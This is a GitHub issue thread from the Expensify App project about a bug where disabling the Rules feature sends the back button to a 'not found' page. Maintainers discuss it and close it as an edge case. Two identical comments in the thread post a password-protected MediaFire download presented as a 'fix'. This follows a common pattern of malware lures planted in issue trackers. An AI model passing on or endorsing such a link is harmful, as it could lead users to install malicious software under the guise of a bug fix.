### ISSUE TITLE
[$250] Rules - App returns to not here page after disabling Rules

### ISSUE THREAD

**Issue by IuliiaHerets** [Expensify/App#48054] opened 2024-08-27 07:00 UTC
If you haven’t already, check out our [contributing guidelines](https://github.com/Expensify/ReactNativeChat/blob/main/contributingGuides/CONTRIBUTING.md) for onboarding and email contributors@expensify.com to request to join our Slack channel!
___
 
**Version Number:** v9.0.25-0
**Reproducible in staging?:** Y
**Reproducible in production?:** N
**Email or phone of affected tester (no customers):** applausetester+kh050806@applause.expensifail.com
**Issue reported by:** Applause Internal Team

## Action Performed:
Precondition:
- Tags feature is disabled.

1. Go to staging.new.expensify.com
2. Go to workspace settings > Rules.
3. Click tags.
4. On More features page, disable Rules.
5. Tap app back button.

## Expected Result:
App will return to workspace editor page.

## Actual Result:
App returns to not here page.

## Workaround:
Unknown

## Platforms:

- [x] Android: Native
- [x] Android: mWeb Chrome
- [ ] iOS: Native
- [ ] iOS: mWeb Safari
- [x] MacOS: Chrome / Safari
- [x] MacOS: Desktop

## Screenshots/Videos

https://github.com/user-attachments/assets/26c7d41d-97ca-4b7b-9119-b8b5e7ad0b20

</details>

[View all open jobs on GitHub](https://github.com/Expensify/App/issues?q=is%3Aopen+is%3Aissue+label%3A%22Help+Wanted%22)

<details><summary>Upwork Automation - Do Not Edit</summary>
    <ul>
        <li>Upwork Job URL: https://www.upwork.com/jobs/~01c846999c3a53187c</li>
        <li>Upwork Job ID: 1828377043023943988</li>
        <li>Last Price Increase: 2024-08-27</li>
<li>Automatic offers: </li>
<ul>
<li>brunovjk | Reviewer | 103700946</li>
</ul></li>
    </ul>
</details>

<details><summary>Issue Owner</summary>Current Issue Owner: @brunovjk</details>

**Comment by IuliiaHerets** [comment] 2024-08-27 07:01
We think that this bug might be related to #wave-control

**Comment by praveenking945** [comment] 2024-08-27 07:35
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by praveenking945** [comment] 2024-08-27 07:38
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Julesssss** [comment] 2024-08-27 10:20
> workspaceRules is in beta. Not deploy blocker

Agree.

**Comment by trjExpensify** [comment] 2024-08-27 12:38
Bringing it to the attention of the team in thread: https://expensify.slack.com/archives/C06ML6X0W9L/p1724762281982389?thread_ts=1724709178.360259&cid=C06ML6X0W9L

**Comment by WojtekBoman** [comment] 2024-08-27 12:42
Hi! I'm going to work on that :)

**Comment by WojtekBoman** [comment] 2024-08-27 14:57
I have an idea how we can solve this issue:

I can check in navigation state if the user has access to the page which is displayed after going back. If the page's feature is disabled, this page will be skipped. But in this case I can't change the browser back button behaviour because I can't modify the browser's history, it would be fixed only for the app and android native back buttons.
The app back button:

https://github.com/user-attachments/assets/a0334d52-4692-4de0-b15a-c739d7f967d1

The browser back button:

https://github.com/user-attachments/assets/b498eb1c-8531-476e-a503-a2b9766eec55

This case is also reproducible on other pages connected with features that can be enabled, here's an example: 

https://github.com/user-attachments/assets/493918f8-0da9-4b70-98af-f0e38e64020b

Please let me know if this solution is ok for you

**Comment by marcaaron** [comment] 2024-08-27 19:40
@Julesssss feel free to hand this off to me if you'd like as it's related to OldDot Rules migration

**Comment by Julesssss** [comment] 2024-08-28 08:10
Sure, thanks

**Comment by brunovjk** [comment] 2024-08-28 19:45
Hi @WojtekBoman, Thanks for looking into this issue! Your proposed solution for handling the navigation state and preventing users from landing on a disabled page seems solid. It might also be beneficial to explore a solution for the browser back button issue, if feasible. @marcaaron, what are your thoughts on this approach?

**Comment by marcaaron** [comment] 2024-08-28 21:51
@trjExpensify do you know if we have a standard way of handling this sort of navigation pattern. It sort of makes sense to me that if a page becomes inaccessible, but exists in the browser history that we'd be aright to just show the "not found" page. It's not like the user is trapped there forever. Feels kind of edge case to me and unsure if it warrants doing any complex manipulation of the history stack.

**Comment by trjExpensify** [comment] 2024-08-29 11:28
I think our standard is to just show the not found guy. I agree it's edge case territory. 👍

**Comment by marcaaron** [comment] 2024-08-30 00:25
Ok, I'm gonna close this out.

**Closed by marcaaron** 2024-08-30 00:25 UTC
Labels: External, Engineering, Daily, Bug
